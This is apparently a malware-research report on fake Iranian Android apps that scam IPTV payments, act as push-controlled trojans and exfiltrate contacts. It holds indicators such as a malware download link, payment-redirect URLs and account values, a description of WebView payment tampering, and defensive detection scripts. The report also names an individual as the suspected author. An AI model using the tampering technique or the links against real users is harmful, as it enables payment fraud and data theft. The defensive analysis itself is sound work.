Fake mobile apps in Iran (Part III)


Fraud, Phishing and Users at risk

It is now one month since we received the first report of the distribution of a fake VPN Android App in Iran. In the first two parts of our research we documented what the App released in January was doing and how we traced it back to Amir Parsa Dehfuli, a freelance consultant of the company Ad-venture.ir in Iran. The application that caught our attention was advertised as the VPN “psiphon6”, and its distribution took advantage of the Telegram blocking in the country. Once installed, the application remained hidden in the mobile device acting as a “bot”, obeying commands sent from two Push Notification Services (pushe.co and onesignal.com).

The fake application, with the internal Android name “ir.ops.breacker”, was installed almost 120.000 times, 80% of those inside Iran, and as we discovered later it was designed to increase “clicks” on Telegram posts, steal personal information and promote other malicious Android Apps.

One of the aspects that we managed to confirm is that the “fake app” psiphon6 was not written during the week of the Telegram blocking. Amir Parsa Dehfuli (APD) instead took the code of another fake application that he was already using, namely ir.persianlifeme.mahvare, and changed the logo and a few internal messages to make it look like “psiphon6”. While he and his friends at Ad-venture.ir were complaining about the Telegram blocking in Iran and the millions of jobs that were going to be lost, the blocking opened an opportunity for APD and his Namazhe Team to keep spreading the Android Trojan.


Linking “APD” with other fake Apps

One of the questions that we wanted to answer was whether this malware was connected with other fraudulent activities. According to Mohammadreza Niyazi, co-director of Ad-venture.ir, Amir Parsa is just a young talented programmer with lots of curiosity who is “just playing” around. After two weeks of analysis we identified thirty unique samples with common patterns. Using a Java decompiler and running the samples in a sandbox, we found the following means to link them together.

Here is a brief explanation of the methodology we used:

  • Digital Signatures

Android applications are digitally signed, and a digital certificate (CERT.RSA) contains the public key that allows the verification of the code’s digital signature. Two public keys, with SHA1 fingerprints AB:65:DF:AB:8E:6C:FB:7E:46:E2:5A:14:19:4B:D3:A8:E5:F7:4A:E2 and C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85, helped us to link together 23 samples (10 + 13).

  • Re-use of code base

In order to quickly verify if the samples were re-using the code, we looked into total file size, file structure and the differences in certain files (e.g. buy.java, MainActivity.java)

  • Linked to payment portals

We looked for the presence of payment portals and redirection URLs (e.g. porche.ml, eligeram.net, elicharge.ir).

  • Shared tokens in notification services

We looked into the Push Notification Service (PNS) used by the applications and the tokens they carry, in order to link applications that are just “repacks” under different names. We linked the Apps that shared accounts at pushe.co and onesignal.com.

  • Use of short URL services

In the Apps that used SMS for distribution we looked for common short URL links in the services yon.ir, bit.do and qqt.ir.

  • Common IPTV service

In the Apps that contain an IPTV streaming service we looked for references to the service IPTV MAX and the dynamic domain name iptvir.ddns.me.
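As an added illustration of the linking methodology above (example code written for this write-up, not the authors' own tooling), the script below groups samples that share at least one artefact. The two certificate fingerprints are the ones reported here and the package names come from this report; every pushe/onesignal id and short URL is a constructed placeholder, and the artefacts are assumed to have been extracted from each sample beforehand.

```python
"""Group APK samples into campaigns by the artefacts they share (signing
certificate fingerprint, push-notification account, short URL, IPTV host),
i.e. the linking criteria of this report. Added example, not the authors'
tooling; artefacts are assumed already extracted from each sample."""
from collections import defaultdict

# CERT_A/CERT_B are the two SHA1 fingerprints reported above; every
# pushe/onesignal id and short URL below is a constructed placeholder.
CERT_A = "AB:65:DF:AB:8E:6C:FB:7E:46:E2:5A:14:19:4B:D3:A8:E5:F7:4A:E2"
CERT_B = "C7:42:53:FD:1A:0D:D8:B1:32:84:FD:16:48:E5:04:FB:F8:4A:51:85"
SAMPLES = {
    "ir.persianlifeme.mahvare#1": {"cert": CERT_A, "iptv": "iptvir.ddns.me"},
    "ir.persianlifeme.mahvare#2": {"cert": CERT_A, "pns": "pushe:PLACEHOLDER-1"},
    "ir.ops.breacker#1": {"cert": CERT_B, "pns": "pushe:PLACEHOLDER-1",
                          "shorturl": "bit.do/PLACEHOLDER"},
    "ir.persianlifeme.irani#1": {"cert": CERT_B, "shorturl": "bit.do/PLACEHOLDER"},
    "unrelated.app#1": {"cert": "00:" * 19 + "00", "pns": "onesignal:PLACEHOLDER-9"},
}

def _find(parent, x):
    """Union-find root lookup with path halving."""
    while parent[x] != x:
        parent[x] = parent[parent[x]]
        x = parent[x]
    return x

def shared_artefacts(samples):
    """{(kind, value): [sample, ...]} for every artefact seen in two or more samples."""
    owners = defaultdict(list)
    for name, artefacts in samples.items():
        for kind, value in artefacts.items():
            owners[(kind, value)].append(name)
    return {key: names for key, names in owners.items() if len(names) > 1}

def link_samples(samples):
    """Clusters (frozensets of sample names, largest first) formed by joining
    every pair of samples that share at least one artefact."""
    parent = {name: name for name in samples}
    for names in shared_artefacts(samples).values():
        root = _find(parent, names[0])
        for other in names[1:]:
            parent[_find(parent, other)] = root
    clusters = defaultdict(set)
    for name in samples:
        clusters[_find(parent, name)].add(name)
    return sorted((frozenset(c) for c in clusters.values()), key=len, reverse=True)

def explain_link(samples, a, b):
    """Artefacts directly shared by samples a and b (one hop of the chain)."""
    return sorted(k for k, v in shared_artefacts(samples).items() if a in v and b in v)
```

A sample signed with the second key but pushing through the same pushe account as a mahvare sample lands in the same cluster, which is exactly the repack relationship the report describes.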

What did we find?

This is “Namazhe Team”… it is just the beginning.

We found that “APD” and his “Namazhe Team” have been distributing fake Apps at least since March 2017, and we found two main code bases in use: IPTV (mahvare) and its later evolution Ops.breacker (psiphon6). We use the names “mahvare” and “psiphon6” here to refer to each of these attack branches and to the main phases of their spread campaigns. More on this in Appendix A.

Mahvare (Portable Satellite)

The first application that APD distributed was a “Portable Satellite TV” application that lets you watch pay TV channels on the mobile phone using an IPTV streaming service. The application streams channels from a server hosted at the dynamic domain iptvir.ddns.me, which seems connected to the service iptv-max.com.


The interesting part of the application is how the payment for the service takes place. The application launches a “WebView” that connects over SSL to the “Credit Card Portal” at “bmp.shaparak.ir” to pay 20.000 IRR. The application asks for 0.54 USD to be activated, something that many users might find more than reasonable, but when the user submits the credit card details, JavaScript injected through the “WebView” changes the total amount to be paid and also the account number that will receive the payment.

In the code we decompiled we could see that four possible accounts are used to receive the payments. Neither these accounts nor the real payment are visible to the user.


With this technique, an external server can control the real amount that the user will pay, while the App overwrites what the user thinks they are paying.


Update!

In Iran, the App market Cafebazaar has an explicit policy against using WebView in Android for payment platforms.


Ops.Breacker (psiphon6)

In July 2017 a new version of “Mahvare” was released. The application pretends that it cannot be installed on the phone at all and, instead of scamming users via IPTV payment services, focuses directly on operating as a more complex “Trojan” that can be fully controlled via Push Notifications.

The initial SMS used to distribute the new App carried the text

“اینو نصب کن تا بدون کم شدن از شارژ اینترنت ، ماهواره رو تو گوشیت تماشا کنی”

(Install this so you can watch Satellite TV channels in your phone for free)

and this message was changed across the different SMS campaigns.

The first release of the App used the short URL http://bit.do/mahvares, which redirected to http://uupload.ir/filelink/kONA6DtKKKHY/6tae_mahvare.apk

Users at risk

Data Exfiltration

Psiphon6 (ir.ops.breacker/ir.persianlifeme.irani) is able to exfiltrate the full phone contact list when requested by a Push Notification command. The command includes the web server where the contacts are to be sent. For each phone contact, a GET request carries the name and the phone number in the variables p1 and p2.
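A detection angle on the contact exfiltration just described, as an added example that is not part of the original report: the script scans web-proxy log lines for the one-GET-per-contact pattern (name in p1, phone number in p2) going to the same host. The log format, client addresses and hosts are constructed for the example.

```python
"""Spot the contact-dump pattern from the report in web-proxy logs: one GET per
contact to the same host, with the name in p1 and the phone number in p2.
Added example, not the authors' tooling; log format and values are constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed log lines: timestamp, client address, method, URL. The hosts are
# placeholders (.invalid), not indicators from the report.
SAMPLE_LOG = """\
2018-01-20T10:00:01 10.0.0.7 GET http://c2.example.invalid/up.php?p1=Ali&p2=%2B989120000001
2018-01-20T10:00:01 10.0.0.7 GET http://c2.example.invalid/up.php?p1=Sara&p2=%2B989120000002
2018-01-20T10:00:02 10.0.0.7 GET http://c2.example.invalid/up.php?p1=Reza&p2=09120000003
2018-01-20T10:00:02 10.0.0.7 GET http://c2.example.invalid/up.php?p1=Mina&p2=09120000004
2018-01-20T10:00:03 10.0.0.7 GET http://c2.example.invalid/up.php?p1=Omid&p2=09120000005
2018-01-20T10:00:09 10.0.0.9 GET http://shop.example.invalid/item?p1=1&p2=2
2018-01-20T10:05:00 10.0.0.7 GET http://news.example.invalid/index.html
"""
LINE = re.compile(r"^(\S+)\s+(\S+)\s+GET\s+(\S+)")
PHONE = re.compile(r"^\+?\d{7,15}$")          # loose international/local number shape

def parse_request(line):
    """(client, host, p1, p2) for a GET line, or None for anything else."""
    m = LINE.match(line)
    if not m:
        return None
    _, client, url = m.groups()
    parts = urlsplit(url)
    query = parse_qs(parts.query)             # also decodes %2B back to '+'
    return client, parts.hostname, query.get("p1", [None])[0], query.get("p2", [None])[0]

def detect_contact_exfil(log_text, min_contacts=3):
    """Map (client, host) -> number of distinct phone numbers sent as p2 together
    with a non-empty p1, keeping only flows that reach min_contacts."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_request(line)
        if rec is None:
            continue
        client, host, name, phone = rec
        if name and phone and PHONE.match(phone):
            seen[(client, host)].add(phone)
    return {key: len(nums) for key, nums in seen.items() if len(nums) >= min_contacts}
```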

Manipulating web content

In Android, web pages can be rendered on the mobile device either by calling the mobile web browser or by using a “WebView”. When handling a web page with WebView, the developer of an App can use the method evaluateJavascript, which evaluates JavaScript in the context of the currently displayed page and can therefore alter its content.

What does this mean in practice? It means that once a page is loaded (onPageFinished), the WebView can re-process the content and use JavaScript (evaluateJavascript) to change any element of the page, regardless of whether the website is protected by SSL.
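For both the payment manipulation described under Mahvare and the evaluateJavascript mechanism explained here, the following static check (added for this write-up; not the authors' tooling and not code from the analysed APKs) flags decompiled sources in which script is injected into a loaded page and rewrites its content. The Java excerpt is a constructed stand-in for decompiler output, and ACCOUNT_PLACEHOLDER is not a real value.

```python
"""Static triage for the WebView tampering pattern described in the report:
flag decompiled Android sources where script is injected once a page has
loaded (onPageFinished) and that script rewrites page content. Added example."""
import re

# Constructed decompiled-Java stand-in modelled on the described behaviour.
# ACCOUNT_PLACEHOLDER marks whatever value the injected script writes.
SAMPLE_JAVA = r'''
public class Buy extends Activity {
    protected void onCreate(Bundle b) {
        WebView w = new WebView(this);
        w.loadUrl("https://bmp.shaparak.ir/pay");   // plain navigation, not injection
    }
    class Client extends WebViewClient {
        public void onPageFinished(WebView view, String url) {
            view.evaluateJavascript(
                "document.getElementById('amount').innerHTML='ACCOUNT_PLACEHOLDER';", null);
        }
    }
}
'''
METHOD = re.compile(r"\b(\w[\w<>\[\]]*)\s+(\w+)\s*\([^)]*\)\s*\{")          # type name(args) {
INJECT = re.compile(r'\b(evaluateJavascript|loadUrl)\s*\(\s*"(javascript:)?((?:[^"\\]|\\.)*)"')
DOM_WRITE = re.compile(r"\.(?:innerHTML|value)\s*=(?!=)")                    # assignment, not ==
PAY_HOST = re.compile(r"shaparak\.ir", re.I)                                 # gateway named in the report

def enclosing_method(src, pos):
    """Name of the last method declared before offset pos (adequate for decompiler output)."""
    names = [m.group(2) for m in METHOD.finditer(src, 0, pos)]
    return names[-1] if names else None

def find_webview_injection(src):
    """One finding per script injection: API, method, after-load flag, DOM-rewrite flag."""
    findings = []
    for m in INJECT.finditer(src):
        api, js_prefix, script = m.groups()
        if api == "loadUrl" and not js_prefix:
            continue                       # ordinary navigation, skip
        method = enclosing_method(src, m.start())
        findings.append({"api": api, "method": method,
                         "after_load": method == "onPageFinished",
                         "rewrites_dom": bool(DOM_WRITE.search(script))})
    return findings

def risk_level(src):
    """'high' when a loaded payment page is rewritten, 'review' for other injections."""
    findings = find_webview_injection(src)
    if PAY_HOST.search(src) and any(f["after_load"] and f["rewrites_dom"] for f in findings):
        return "high"
    return "review" if findings else "none"
```

The check is a triage aid only: injected script assembled at runtime or loaded from a server will not appear as a string literal, so a "none" result still calls for dynamic analysis.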

During the preparation of this report we got in touch with Ali Molaei, an Iranian Android developer, who explained to us in detail how this attack works. He wanted to show people how risky it is to enter data inside “WebViews” in Apps, so we came up with a challenge.

We invited Ali to make a demo of the attack and manipulate the page: https://www.qurium.org/the-answer-is-42/.

Check out his video, in which he shows how to manipulate the web content of our demo page: WebView re-rendering in action.

Who is affected?

In nine months there were a total of 1.6 million installations, distributed among 14 different Android Apps. While more than 90% of the infections took place in Iran, 60.000 users were affected in Europe and 30.000 in the USA.


IR 92.08%
US 1.74%
AE 1.60%
RO 1.47%
GB 0.72%
DE 0.63%
NL 0.52%
AF 0.27%
FR 0.16%
IQ 0.12%
TR 0.12%
IT 0.06%
MD 0.05%
CA 0.05%
IN 0.04%
SE 0.03%
SG 0.03%
JP 0.02%

Conclusions

During the last ten months of operation, APD and his Namazhe Team have managed to get more than 1.6 million fake applications installed by mobile users inside and outside Iran. While the main focus of the first fake App seemed to be scamming users through the payment of IPTV services, a second round of applications focused on enriching the capabilities of the initial Trojan to drive Telegram traffic and steal personal information.


Acknowledgements

Thanks to:

  1. The fantastic service Koodous that helped us to track and download the APK samples.
  2. The project telescam.ir that gave us great insight into the IPTV fraud.
  3. @hooshmandk, who released the first forensic report about this case at scriptics.ir.
  4. Amin and Mahmood from Smallmedia, for our discussions about the RSA certificate fingerprinting.
  5. ASL19, for getting our executive summary translated in no time.
  6. Ali Molaei, for his demo of the risks of opening pages in WebView.

Appendix A

Version 1 (March – April)
ir.besteveryeverapp.telegram: 10 Mar 2017 IPTV Scam اهواره جیبی (“Portable Satellite”)
ir.persianlifeme.mahvare: 30 Apr 2017 IPTV Scam

Version 2 (July – October – February 2018)
ir.persianlifeme.freeforall: 22 Jul 2017 SMS Breacker
ir.persianlifeme.vipforall: 26 Sep 2017 SMS Breacker
ir.persianlifeme.vipfora: 7 Oct 2017 SMS Breacker
ir.ops.breaker: 30 Oct 2017 SMS Breacker
ir.persianlifeme.irani: 30 Oct 2017 SMS Breacker

Version ? (April – July)
ir.milano.smartcall: 1 Apr 2017 MLNO?
ir.milano.driver1: 4 Apr 2017 MLNO?
ir.unclemilad.dotsgame: 26 Apr 2017 ???

  • ir.hamzad.telegram: 29 May 2017 MLNO?
    https://cafebazaar.ir/app/ir.hamzad.telegram/ (Clone of this?)

  • ir.persianapps.androidhelpers: 16 May 2017
    Promises to be able to track a person’s location and asks for payment via elicharge.ir
    http://elicharge.ir/findnumberonthemap.php?p1=

  • ir.appfarsi.tahahafez: 12 May 2017
    https://cafebazaar.ir/app/ir.appfarsi.tahahafez/?l=en (Clone of this?)
    http://elicharge.ir/Api-master/checkh.php پرداخت و ارتقا به نسخه کامل برنامه (“Payment and upgrade to the full version of the app”)

  • ir.persianapps.aksprofilecartoon: 01 Jul 2017 ???


    Appendix B: SHA1 Public Key, APP Name, SHA256 Hash, APP Size


Appendix C: The Account values

innerHTML values
8  2223566
40 2168264
40 6541864
40 8162547
40 8165486
80 2175381

Initialization values
33 t1 2180607
33 t2 2223566

Appendix D: Payment Redirectors

4  http://Proche.ml/paymah
4  http://Proche.ml/paymass
41 http://Proche.ml/paymdow
4  http://Proche.ml/paymup4
4  https://hamzad.net/paymahcenter
2  https://hamzad.net/paymahz
6  https://hamzad.net/paytel
2  https://hamzad.net/paytv
14 https://hamzad.net/paytvday2
9  https://hamzad.net/paytvday3

“Parsa was a rich kid and didn’t expect us to pay him. He did the telegram work and we did our job.”

Mohammadreza Niyazi – Co-Founder Ad-venture.ir